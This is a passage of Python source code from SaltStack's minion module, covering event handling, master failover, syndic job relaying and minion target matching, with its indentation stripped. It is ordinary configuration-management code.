elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__master_disconnected') or tag.startswith('__master_failback'):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith('__master_disconnected') and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith('__master_failback'):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=package.startswith('__master_failback'))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name='__master_failback',
schedule=schedule)
else:
self.schedule.delete_job(name='__master_failback', persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar for id '+self.opts['id']+'. '+\
'Check your pillar configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
